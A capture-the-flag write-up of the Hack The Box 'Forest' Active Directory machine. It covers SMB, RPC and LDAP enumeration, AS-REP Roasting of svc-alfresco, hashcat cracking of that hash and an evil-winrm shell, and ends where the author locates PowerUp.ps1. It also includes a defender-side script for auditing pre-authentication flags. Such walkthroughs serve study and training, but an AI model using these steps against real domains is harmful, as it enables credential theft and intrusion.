HTB - Forest
- Nmap Scan
- Enumeration
- Initial Access
- Privilege Enumeration
- Running SharpHound
- Privilege Escalation
- Lateral Movement
Nmap Scan
Performing an nmap scan on the target machine,
┌──(kali㉿aidenpearce369)-[~]
└─$ nmap -sV -sC -A 10.10.10.161
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-27 02:17 EDT
Nmap scan report for 10.10.10.161
Host is up (0.26s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-03-27 06:30:47Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: FOREST; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 2h30m58s, deviation: 4h02m30s, median: 10m58s
| smb2-time:
| date: 2022-03-27T06:31:20
|_ start_date: 2022-03-27T06:22:50
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
| smb-os-discovery:
| OS: Windows Server 2016 Standard 14393 (Windows Server 2016 Standard 6.3)
| Computer name: FOREST
| NetBIOS computer name: FOREST\x00
| Domain name: htb.local
| Forest name: htb.local
| FQDN: FOREST.htb.local
|_ System time: 2022-03-26T23:31:16-07:00
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 214.21 seconds
It seems like an Active Directory environment, with lots of services running on it.
Scanning for services running on other ports,
┌──(kali㉿aidenpearce369)-[~]
└─$ nmap -p1-10000 -T4 10.10.10.161
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-27 02:37 EDT
Nmap scan report for 10.10.10.161
Host is up (0.24s latency).
Not shown: 9986 closed tcp ports (conn-refused)
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
4793/tcp filtered unknown
5985/tcp open wsman
9389/tcp open adws
Nmap done: 1 IP address (1 host up) scanned in 328.70 seconds
Enumeration
From the nmap scan result, we can see that the machine is running on a domain named htb.local.
Here, 5985/tcp open wsman is running, which means PS-Remoting is enabled.
We can also find 53/tcp open domain and 389/tcp open ldap running on this machine, which means the target is a Domain Controller.
Enumerating SMB
For the SMB service,
| smb2-security-mode:
| 3.1.1:
|_ Message signing enabled and required
So we can't perform SMB relay attacks, since SMB signing is enabled and required.
Enumerating SMB with smbmap and smbclient,
┌──(kali㉿aidenpearce369)-[~]
└─$ smbmap -H 10.10.10.161
[+] IP: 10.10.10.161:445 Name: 10.10.10.161
┌──(kali㉿aidenpearce369)-[~]
└─$ smbmap -H 10.10.10.161 -u monish -p fake
[!] Authentication error on 10.10.10.161
┌──(kali㉿aidenpearce369)-[~]
└─$ smbclient -L //10.10.10.161 -N
Anonymous login successful
Sharename Type Comment
--------- ---- -------
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.10.161 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available
It seems like it requires authentication
Enumerating RPC
Let's enumerate RPC with a null session (no password),
┌──(kali㉿aidenpearce369)-[~]
└─$ rpcclient 10.10.10.161 -U "" -N
rpcclient $> help
--------------- ----------------------
MDSSVC
fetch_properties Fetch connection properties
fetch_attributes Fetch attribute
...
Since we are able to run commands over RPC, we can do some enumeration of the domain here.
Enumerating domain information,
rpcclient $> enumdomains
name:[HTB] idx:[0x0]
name:[Builtin] idx:[0x0]
Enumerating domain users,
rpcclient $> enumdomusers
user:[Administrator] rid:[0x1f4]
user:[Guest] rid:[0x1f5]
user:[krbtgt] rid:[0x1f6]
user:[DefaultAccount] rid:[0x1f7]
user:[$331000-VK4ADACQNUCA] rid:[0x463]
user:[SM_2c8eef0a09b545acb] rid:[0x464]
user:[SM_ca8c2ed5bdab4dc9b] rid:[0x465]
user:[SM_75a538d3025e4db9a] rid:[0x466]
user:[SM_681f53d4942840e18] rid:[0x467]
user:[SM_1b41c9286325456bb] rid:[0x468]
user:[SM_9b69f1b9d2cc45549] rid:[0x469]
user:[SM_7c96b981967141ebb] rid:[0x46a]
user:[SM_c75ee099d0a64c91b] rid:[0x46b]
user:[SM_1ffab36a2f5f479cb] rid:[0x46c]
user:[HealthMailboxc3d7722] rid:[0x46e]
user:[HealthMailboxfc9daad] rid:[0x46f]
user:[HealthMailboxc0a90c9] rid:[0x470]
user:[HealthMailbox670628e] rid:[0x471]
user:[HealthMailbox968e74d] rid:[0x472]
user:[HealthMailbox6ded678] rid:[0x473]
user:[HealthMailbox83d6781] rid:[0x474]
user:[HealthMailboxfd87238] rid:[0x475]
user:[HealthMailboxb01ac64] rid:[0x476]
user:[HealthMailbox7108a4e] rid:[0x477]
user:[HealthMailbox0659cc1] rid:[0x478]
user:[sebastien] rid:[0x479]
user:[lucinda] rid:[0x47a]
user:[svc-alfresco] rid:[0x47b]
user:[andy] rid:[0x47e]
user:[mark] rid:[0x47f]
user:[santi] rid:[0x480]
Enumerating domain groups,
rpcclient $> enumdomgroups
group:[Enterprise Read-only Domain Controllers] rid:[0x1f2]
group:[Domain Admins] rid:[0x200]
group:[Domain Users] rid:[0x201]
group:[Domain Guests] rid:[0x202]
group:[Domain Computers] rid:[0x203]
group:[Domain Controllers] rid:[0x204]
group:[Schema Admins] rid:[0x206]
group:[Enterprise Admins] rid:[0x207]
group:[Group Policy Creator Owners] rid:[0x208]
group:[Read-only Domain Controllers] rid:[0x209]
group:[Cloneable Domain Controllers] rid:[0x20a]
group:[Protected Users] rid:[0x20d]
group:[Key Admins] rid:[0x20e]
group:[Enterprise Key Admins] rid:[0x20f]
group:[DnsUpdateProxy] rid:[0x44e]
group:[Organization Management] rid:[0x450]
group:[Recipient Management] rid:[0x451]
group:[View-Only Organization Management] rid:[0x452]
group:[Public Folder Management] rid:[0x453]
group:[UM Management] rid:[0x454]
group:[Help Desk] rid:[0x455]
group:[Records Management] rid:[0x456]
group:[Discovery Management] rid:[0x457]
group:[Server Management] rid:[0x458]
group:[Delegated Setup] rid:[0x459]
group:[Hygiene Management] rid:[0x45a]
group:[Compliance Management] rid:[0x45b]
group:[Security Reader] rid:[0x45c]
group:[Security Administrator] rid:[0x45d]
group:[Exchange Servers] rid:[0x45e]
group:[Exchange Trusted Subsystem] rid:[0x45f]
group:[Managed Availability Servers] rid:[0x460]
group:[Exchange Windows Permissions] rid:[0x461]
group:[ExchangeLegacyInterop] rid:[0x462]
group:[$D31000-NSEL5BRJ63V7] rid:[0x46d]
group:[Service Accounts] rid:[0x47c]
group:[Privileged IT Accounts] rid:[0x47d]
group:[test] rid:[0x13ed]
At least we got some basic information useful for passive enumeration; rpcclient required authentication for further active enumeration.
We can also query some account information by passing the Relative Identifier (RID), in this case for our Domain Admin, Administrator,
rpcclient $> queryuser 0x1f4
User Name : Administrator
Full Name : Administrator
Home Drive :
Dir Drive :
Profile Path:
Logon Script:
Description : Built-in account for administering the computer/domain
Workstations:
Comment :
Remote Dial :
Logon Time : Sun, 27 Mar 2022 02:23:35 EDT
Logoff Time : Wed, 31 Dec 1969 19:00:00 EST
Kickoff Time : Wed, 31 Dec 1969 19:00:00 EST
Password last set Time : Mon, 30 Aug 2021 20:51:59 EDT
Password can change Time : Tue, 31 Aug 2021 20:51:59 EDT
Password must change Time: Wed, 13 Sep 30828 22:48:05 EDT
unknown_2[0..31]...
user_rid : 0x1f4
group_rid: 0x201
acb_info : 0x00000010
fields_present: 0x00ffffff
logon_divs: 168
bad_password_count: 0x00000000
logon_count: 0x00000061
padding1[0..7]...
logon_hrs[0..21]...
Let's query the group details and its members; in this case we will try the Domain Admins group,
rpcclient $> querygroup 0x200
Group Name: Domain Admins
Description: Designated administrators of the domain
Group Attribute:7
Num Members:1
rpcclient $> querygroupmem 0x200
rid:[0x1f4] attr:[0x7]
Enumerating LDAP
Since the ldap service is running, let's try to query it with anonymous/null binding.
Running ldapsearch,
┌──(kali㉿aidenpearce369)-[~]
└─$ ldapsearch -h 10.10.10.161 -D "DC=htb,DC=local" -b "DC=htb,DC=local"
# extended LDIF
#
# LDAPv3
# base <DC=htb,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# htb.local
dn: DC=htb,DC=local
objectClass: top
objectClass: domain
objectClass: domainDNS
distinguishedName: DC=htb,DC=local
instanceType: 5
whenCreated: 20190918174549.0Z
whenChanged: 20220327062240.0Z
subRefs: DC=ForestDnsZones,DC=htb,DC=local
subRefs: DC=DomainDnsZones,DC=htb,DC=local
subRefs: CN=Configuration,DC=htb,DC=local
uSNCreated: 4099
dSASignature:: AQAAACgAAAAAAAAAAAAAAAAAAAAAAAAAOqNrI1l5QUq5WV+CaJoIcQ==
uSNChanged: 888873
name: htb
objectGUID:: Gsfw30mpJkuMe1Lj4stuqw==
...
So we can perform anonymous/null binding.
Let's try passing custom queries to enumerate further.
Searching under the Users CN,
┌──(kali㉿aidenpearce369)-[~]
└─$ ldapsearch -h 10.10.10.161 -D "DC=htb,DC=local" -b "CN=Users,DC=htb,DC=local" | grep dn
dn: CN=Users,DC=htb,DC=local
dn: CN=Allowed RODC Password Replication Group,CN=Users,DC=htb,DC=local
dn: CN=Denied RODC Password Replication Group,CN=Users,DC=htb,DC=local
dn: CN=Read-only Domain Controllers,CN=Users,DC=htb,DC=local
dn: CN=Enterprise Read-only Domain Controllers,CN=Users,DC=htb,DC=local
dn: CN=Cloneable Domain Controllers,CN=Users,DC=htb,DC=local
dn: CN=Protected Users,CN=Users,DC=htb,DC=local
dn: CN=Key Admins,CN=Users,DC=htb,DC=local
dn: CN=Enterprise Key Admins,CN=Users,DC=htb,DC=local
dn: CN=DnsAdmins,CN=Users,DC=htb,DC=local
dn: CN=DnsUpdateProxy,CN=Users,DC=htb,DC=local
dn: CN=Exchange Online-ApplicationAccount,CN=Users,DC=htb,DC=local
dn: CN=SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1},CN=Users,DC=htb,DC=
dn: CN=SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c},CN=Users,DC=htb,DC=
dn: CN=SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9},CN=Users,DC=htb,DC=
dn: CN=DiscoverySearchMailbox {D919BA05-46A6-415f-80AD-7E09334BB852},CN=Users,
dn: CN=Migration.8f3e7716-2011-43e4-96b1-aba62d229136,CN=Users,DC=htb,DC=local
dn: CN=FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042,CN=Users,DC=htb,DC=
dn: CN=SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201},CN=Users,DC=htb,DC=
dn: CN=SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA},CN=Users,DC=htb,DC=
dn: CN=SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9},CN=Users,DC=htb,DC=
dn: CN=Administrator,CN=Users,DC=htb,DC=local
dn: CN=Guest,CN=Users,DC=htb,DC=local
dn: CN=DefaultAccount,CN=Users,DC=htb,DC=local
dn: CN=krbtgt,CN=Users,DC=htb,DC=local
dn: CN=Domain Computers,CN=Users,DC=htb,DC=local
dn: CN=Domain Controllers,CN=Users,DC=htb,DC=local
dn: CN=Schema Admins,CN=Users,DC=htb,DC=local
dn: CN=Enterprise Admins,CN=Users,DC=htb,DC=local
dn: CN=Cert Publishers,CN=Users,DC=htb,DC=local
dn: CN=Domain Admins,CN=Users,DC=htb,DC=local
dn: CN=Domain Users,CN=Users,DC=htb,DC=local
dn: CN=Domain Guests,CN=Users,DC=htb,DC=local
dn: CN=Group Policy Creator Owners,CN=Users,DC=htb,DC=local
dn: CN=RAS and IAS Servers,CN=Users,DC=htb,DC=local
So these are the possible accounts available in this domain. Listing the sAMAccountName of every person/user object,
┌──(kali㉿aidenpearce369)-[~]
└─$ ldapsearch -h 10.10.10.161 -D "DC=htb,DC=local" -b "DC=htb,DC=local" -W "(|(objectClass=person)(objectClass=user))" sAMAccountName | grep sAM
Enter LDAP Password:
# requesting: sAMAccountName
sAMAccountName: Guest
sAMAccountName: DefaultAccount
sAMAccountName: FOREST$
sAMAccountName: EXCH01$
sAMAccountName: $331000-VK4ADACQNUCA
sAMAccountName: SM_2c8eef0a09b545acb
sAMAccountName: SM_ca8c2ed5bdab4dc9b
sAMAccountName: SM_75a538d3025e4db9a
sAMAccountName: SM_681f53d4942840e18
sAMAccountName: SM_1b41c9286325456bb
sAMAccountName: SM_9b69f1b9d2cc45549
sAMAccountName: SM_7c96b981967141ebb
sAMAccountName: SM_c75ee099d0a64c91b
sAMAccountName: SM_1ffab36a2f5f479cb
sAMAccountName: HealthMailboxc3d7722
sAMAccountName: HealthMailboxfc9daad
sAMAccountName: HealthMailboxc0a90c9
sAMAccountName: HealthMailbox670628e
sAMAccountName: HealthMailbox968e74d
sAMAccountName: HealthMailbox6ded678
sAMAccountName: HealthMailbox83d6781
sAMAccountName: HealthMailboxfd87238
sAMAccountName: HealthMailboxb01ac64
sAMAccountName: HealthMailbox7108a4e
sAMAccountName: HealthMailbox0659cc1
sAMAccountName: sebastien
sAMAccountName: lucinda
sAMAccountName: andy
sAMAccountName: mark
sAMAccountName: santi
Let's try using impacket tools for more detailed output.
Using impacket-GetADUsers to list all users in the domain,
┌──(kali㉿aidenpearce369)-[~]
└─$ impacket-GetADUsers htb.local/ -dc-ip 10.10.10.161 -no-pass -all
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Querying 10.10.10.161 for information about domain.
Name Email PasswordLastSet LastLogon
-------------------- ------------------------------ ------------------- -------------------
Administrator Administrator@htb.local 2021-08-30 20:51:58.690463 2022-03-27 02:23:35.195845
Guest <never> <never>
DefaultAccount <never> <never>
krbtgt 2019-09-18 06:53:23.467452 <never>
$331000-VK4ADACQNUCA <never> <never>
SM_2c8eef0a09b545acb SystemMailbox{1f05a927-89c0-4725-adca-4527114196a1}@htb.local <never> <never>
SM_ca8c2ed5bdab4dc9b SystemMailbox{bb558c35-97f1-4cb9-8ff7-d53741dc928c}@htb.local <never> <never>
SM_75a538d3025e4db9a SystemMailbox{e0dc1c29-89c3-4034-b678-e6c29d823ed9}@htb.local <never> <never>
SM_681f53d4942840e18 DiscoverySearchMailbox{D919BA05-46A6-415f-80AD-7E09334BB852}@htb.local <never> <never>
SM_1b41c9286325456bb Migration.8f3e7716-2011-43e4-96b1-aba62d229136@htb.local <never> <never>
SM_9b69f1b9d2cc45549 FederatedEmail.4c1f4d8b-8179-4148-93bf-00a95fa1e042@htb.local <never> <never>
SM_7c96b981967141ebb SystemMailbox{D0E409A0-AF9B-4720-92FE-AAC869B0D201}@htb.local <never> <never>
SM_c75ee099d0a64c91b SystemMailbox{2CE34405-31BE-455D-89D7-A7C7DA7A0DAA}@htb.local <never> <never>
SM_1ffab36a2f5f479cb SystemMailbox{8cc370d3-822a-4ab8-a926-bb94bd0641a9}@htb.local <never> <never>
HealthMailboxc3d7722 HealthMailboxc3d7722415ad41a5b19e3e00e165edbe@htb.local 2019-09-23 18:51:31.892097 2019-09-23 18:57:12.361516
HealthMailboxfc9daad HealthMailboxfc9daad117b84fe08b081886bd8a5a50@htb.local 2019-09-23 18:51:35.267114 2019-09-23 18:52:05.736012
HealthMailboxc0a90c9 HealthMailboxc0a90c97d4994429b15003d6a518f3f5@htb.local 2019-09-19 07:56:35.206329 <never>
HealthMailbox670628e HealthMailbox670628ec4dd64321acfdf6e67db3a2d8@htb.local 2019-09-19 07:56:45.643993 <never>
HealthMailbox968e74d HealthMailbox968e74dd3edb414cb4018376e7dd95ba@htb.local 2019-09-19 07:56:56.143969 <never>
HealthMailbox6ded678 HealthMailbox6ded67848a234577a1756e072081d01f@htb.local 2019-09-19 07:57:06.597012 <never>
HealthMailbox83d6781 HealthMailbox83d6781be36b4bbf8893b03c2ee379ab@htb.local 2019-09-19 07:57:17.065809 <never>
HealthMailboxfd87238 HealthMailboxfd87238e536e49e08738480d300e3772@htb.local 2019-09-19 07:57:27.487679 <never>
HealthMailboxb01ac64 HealthMailboxb01ac647a64648d2a5fa21df27058a24@htb.local 2019-09-19 07:57:37.878559 <never>
HealthMailbox7108a4e HealthMailbox7108a4e350f84b32a7a90d8e718f78cf@htb.local 2019-09-19 07:57:48.253341 <never>
HealthMailbox0659cc1 HealthMailbox0659cc188f4c4f9f978f6c2142c4181e@htb.local 2019-09-19 07:57:58.643994 <never>
sebastien 2019-09-19 20:29:59.544725 2019-09-22 18:29:29.586227
lucinda 2019-09-19 20:44:13.233891 <never>
svc-alfresco 2022-03-27 03:22:03.296517 2019-09-23 07:09:47.931194
andy 2019-09-22 18:44:16.291082 <never>
mark 2019-09-20 18:57:30.243568 <never>
santi 2019-09-20 19:02:55.134828 <never>
From further enumeration, there are no SPNs and the target is running a 64-bit architecture,
┌──(kali㉿aidenpearce369)-[~]
└─$ impacket-GetUserSPNs htb.local/ -dc-ip 10.10.10.161 -no-pass
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
No entries found!
┌──(kali㉿aidenpearce369)-[~]
└─$ impacket-getArch -target 10.10.10.161
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Gathering OS architecture for 1 machines
[*] Socket connect timeout set to 2 secs
10.10.10.161 is 64-bit
Initial Access
Let's try to search for a user which has the DONT_REQUIRE_PREAUTH UAC flag set, so that we can perform AS-REP Roasting.
Searching for users with the DONT_REQUIRE_PREAUTH UAC flag,
┌──(kali㉿aidenpearce369)-[~]
└─$ impacket-GetNPUsers htb.local/ -dc-ip 10.10.10.161
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
Name MemberOf PasswordLastSet LastLogon UAC
------------ ------------------------------------------------------ -------------------------- -------------------------- --------
svc-alfresco CN=Service Accounts,OU=Security Groups,DC=htb,DC=local 2022-03-27 03:28:19.172241 2019-09-23 07:09:47.931194 0x410200
Requesting the AS-REP for that account (the tool reports this as getting a TGT) so we can crack it offline and recover the plaintext password,
┌──(kali㉿aidenpearce369)-[~]
└─$ impacket-GetNPUsers htb.local/svc-alfresco -dc-ip 10.10.10.161 -no-pass
Impacket v0.9.24 - Copyright 2021 SecureAuth Corporation
[*] Getting TGT for svc-alfresco
$krb5asrep$23$svc-alfresco@HTB.LOCAL:10789994ae3d40e257d6c0e341ae6f8c$4112d63482946a571be87d25346e273412f1e2eefedaada1fbbd53eafd84b4234072c65cade3a75a6d4f0b27336d8fd8a34e6a0c892df2018ec81b3dd7777cb41f56266ef96257039e2f0698f9205c10ad29152a730d3c33d76c5e80c1a70ecc63298357541c87c1c13afb74e2388a912bd6666b3fa7e1ced044a117bd1b365bbc878b72cc181330082c01617077c2a17485dbbb7ae97b58d2317dbc667c540f6914140929dcb26c7b1148e29b9a47b30eafe1f11d461a8a61cce59e2c3295698ef1599b2412670fb1e4b70894eecf172deaa791cd407d0f76bb57ef92c68aeb8dd0ee55b3b9
Now cracking the hash using hashcat (mode 18200),
┌──(aidenpearce369㉿ragnar)-[~]
└─$ hashcat -h | grep 18200
18200 | Kerberos 5 AS-REP etype 23 | Network Protocols
┌──(aidenpearce369㉿ragnar)-[~]
└─$ hashcat -m 18200 '$krb5asrep$23$svc-alfresco@HTB.LOCAL:10789994ae3d40e257d6c0e341ae6f8c$4112d63482946a571be87d25346e273412f1e2eefedaada1fbbd53eafd84b4234072c65cade3a75a6d4f0b27336d8fd8a34e6a0c892df2018ec81b3dd7777cb41f56266ef96257039e2f0698f9205c10ad29152a730d3c33d76c5e80c1a70ecc63298357541c87c1c13afb74e2388a912bd6666b3fa7e1ced044a117bd1b365bbc878b72cc181330082c01617077c2a17485dbbb7ae97b58d2317dbc667c540f6914140929dcb26c7b1148e29b9a47b30eafe1f11d461a8a61cce59e2c3295698ef1599b2412670fb1e4b70894eecf172deaa791cd407d0f76bb57ef92c68aeb8dd0ee55b3b9' /opt/wordlists/rockyou.txt
hashcat (v5.1.0) starting...
* Device #1: WARNING! Kernel exec timeout is not disabled.
This may cause "CL_OUT_OF_RESOURCES" or related errors.
To disable the timeout, see: https://hashcat.net/q/timeoutpatch
nvmlDeviceGetFanSpeed(): Not Supported
OpenCL Platform #1: NVIDIA Corporation
======================================
* Device #1: NVIDIA GeForce RTX 3050 Laptop GPU, 977/3910 MB allocatable, 16MCU
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
Applicable optimizers:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
ATTENTION! Pure (unoptimized) OpenCL kernels selected.
This enables cracking passwords and salts > length 32 but for the price of drastically reduced performance.
If you want to switch to optimized OpenCL kernels, append -O to your commandline.
Watchdog: Temperature abort trigger set to 90c
* Device #1: build_opts '-cl-std=CL1.2 -I OpenCL -I /usr/share/hashcat/OpenCL -D LOCAL_MEM_TYPE=1 -D VENDOR_ID=32 -D CUDA_ARCH=806 -D AMD_ROCM=0 -D VECT_SIZE=1 -D DEVICE_TYPE=4 -D DGST_R0=0 -D DGST_R1=1 -D DGST_R2=2 -D DGST_R3=3 -D DGST_ELEM=4 -D KERN_TYPE=18200 -D _unroll'
* Device #1: Kernel m18200_a0-pure.089e1f35.kernel not found in cache! Building may take a while...
Dictionary cache hit:
* Filename..: /opt/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
$krb5asrep$23$svc-alfresco@HTB.LOCAL:10789994ae3d40e257d6c0e341ae6f8c$4112d63482946a571be87d25346e273412f1e2eefedaada1fbbd53eafd84b4234072c65cade3a75a6d4f0b27336d8fd8a34e6a0c892df2018ec81b3dd7777cb41f56266ef96257039e2f0698f9205c10ad29152a730d3c33d76c5e80c1a70ecc63298357541c87c1c13afb74e2388a912bd6666b3fa7e1ced044a117bd1b365bbc878b72cc181330082c01617077c2a17485dbbb7ae97b58d2317dbc667c540f6914140929dcb26c7b1148e29b9a47b30eafe1f11d461a8a61cce59e2c3295698ef1599b2412670fb1e4b70894eecf172deaa791cd407d0f76bb57ef92c68aeb8dd0ee55b3b9:s3rvice
Session..........: hashcat
Status...........: Cracked
Hash.Type........: Kerberos 5 AS-REP etype 23
Hash.Target......: $krb5asrep$23$svc-alfresco@HTB.LOCAL:10789994ae3d40...55b3b9
Time.Started.....: Sun Mar 27 12:56:43 2022 (1 sec)
Time.Estimated...: Sun Mar 27 12:56:44 2022 (0 secs)
Guess.Base.......: File (/opt/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 18155.2 kH/s (11.80ms) @ Accel:1024 Loops:1 Thr:64 Vec:1
Recovered........: 1/1 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 4194304/14344385 (29.24%)
Rejected.........: 0/4194304 (0.00%)
Restore.Point....: 3145728/14344385 (21.93%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: tomabogu -> rogans
Hardware.Mon.#1..: Temp: 59c Util: 45% Core:1665MHz Mem:5500MHz Bus:4
Started: Sun Mar 27 12:56:39 2022
Stopped: Sun Mar 27 12:56:44 2022
Seems like the password for the account HTB.LOCAL/svc-alfresco is s3rvice.
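As an added defender-side example (not code from the original writeup), this decodes the UAC value 0x410200 that GetNPUsers printed for svc-alfresco above and, over a constructed sample of accounts, lists the ones that have Kerberos pre-authentication disabled, which is the property that makes AS-REP Roasting possible; the flag bits are Microsoft's documented userAccountControl values, and AUDIT_FILTER is the standard bitwise-AND LDAP query an administrator can run against the DC to find such accounts.

```python
# Subset of the documented userAccountControl bits (ADS_USER_FLAG_ENUM).
UAC_FLAGS = {
    0x0002: "ACCOUNTDISABLE",
    0x0010: "LOCKOUT",
    0x0020: "PASSWD_NOTREQD",
    0x0200: "NORMAL_ACCOUNT",
    0x10000: "DONT_EXPIRE_PASSWORD",
    0x80000: "TRUSTED_FOR_DELEGATION",
    0x400000: "DONT_REQUIRE_PREAUTH",
    0x1000000: "TRUSTED_TO_AUTH_FOR_DELEGATION",
}
DONT_REQUIRE_PREAUTH = 0x400000   # decimal 4194304
ACCOUNTDISABLE = 0x0002

# LDAP filter for the same audit against the directory itself;
# 1.2.840.113556.1.4.803 is the LDAP_MATCHING_RULE_BIT_AND rule.
AUDIT_FILTER = ("(&(objectCategory=person)(objectClass=user)"
                "(userAccountControl:1.2.840.113556.1.4.803:=4194304))")


def decode_uac(value):
    """Names of the flags set in a userAccountControl integer, lowest bit first."""
    return [name for bit, name in sorted(UAC_FLAGS.items()) if value & bit]


def preauth_disabled(value):
    """True when the account does not require Kerberos pre-authentication."""
    return bool(value & DONT_REQUIRE_PREAUTH)


def accounts_without_preauth(accounts):
    """Enabled accounts whose DONT_REQUIRE_PREAUTH bit is set.

    accounts is an iterable of (sAMAccountName, userAccountControl) pairs,
    as an auditor would pull them from LDAP."""
    return [name for name, uac in accounts
            if preauth_disabled(uac) and not (uac & ACCOUNTDISABLE)]


# Constructed sample: the svc-alfresco value is the 0x410200 shown above;
# the other values are made up for this example.
SAMPLE_ACCOUNTS = [
    ("Administrator", 0x10200),
    ("svc-alfresco", 0x410200),
    ("Guest", 0x10222),
    ("sebastien", 0x200),
]

if __name__ == "__main__":
    for name, uac in SAMPLE_ACCOUNTS:
        print(f"{name:15} {uac:#09x} {', '.join(decode_uac(uac))}")
    print("pre-auth disabled:", accounts_without_preauth(SAMPLE_ACCOUNTS))
```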
Now let's use evil-winrm over PS-Remoting to gain a shell,
┌──(kali㉿aidenpearce369)-[~]
└─$ evil-winrm -u svc-alfresco -p s3rvice -i 10.10.10.161
Evil-WinRM shell v3.3
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> whoami
htb\svc-alfresco
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> hostname
FOREST
Getting the user flag,
*Evil-WinRM* PS C:\Users\svc-alfresco> dir
Directory: C:\Users\svc-alfresco
Mode LastWriteTime Length Name
---- ------------- ------ ----
d-r--- 9/23/2019 2:16 PM Desktop
d-r--- 9/22/2019 4:02 PM Documents
d-r--- 7/16/2016 6:18 AM Downloads
d-r--- 7/16/2016 6:18 AM Favorites
d-r--- 7/16/2016 6:18 AM Links
d-r--- 7/16/2016 6:18 AM Music
d-r--- 7/16/2016 6:18 AM Pictures
d----- 7/16/2016 6:18 AM Saved Games
d-r--- 7/16/2016 6:18 AM Videos
*Evil-WinRM* PS C:\Users\svc-alfresco> cd Desktop
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> dir
Directory: C:\Users\svc-alfresco\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 3/26/2022 11:23 PM 34 user.txt
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> more user.txt
<USER FLAG>
Privilege Enumeration
Let's try to enumerate the current privileges of the user,
*Evil-WinRM* PS C:\> whoami /groups
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
========================================== ================ ============================================= ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias S-1-5-32-554 Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users Alias S-1-5-32-580 Mandatory group, Enabled by default, Enabled group
BUILTIN\Account Operators Alias S-1-5-32-548 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK Well-known group S-1-5-2 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
HTB\Privileged IT Accounts Group S-1-5-21-3072663084-364016917-1341370565-1149 Mandatory group, Enabled by default, Enabled group
HTB\Service Accounts Group S-1-5-21-3072663084-364016917-1341370565-1148 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
*Evil-WinRM* PS C:\> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ============================== =======
SeMachineAccountPrivilege Add workstations to domain Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\>
Now let's try to run PowerUp.ps1 to check for any possible privilege escalation.
Transferring files via SMB,
┌──(kali㉿aidenpearce369)-[~]
└─$ locate PowerUp.ps1
/usr/lib/python3/dist-packages/cme/data/powersploit/Privesc/PowerUp.ps1
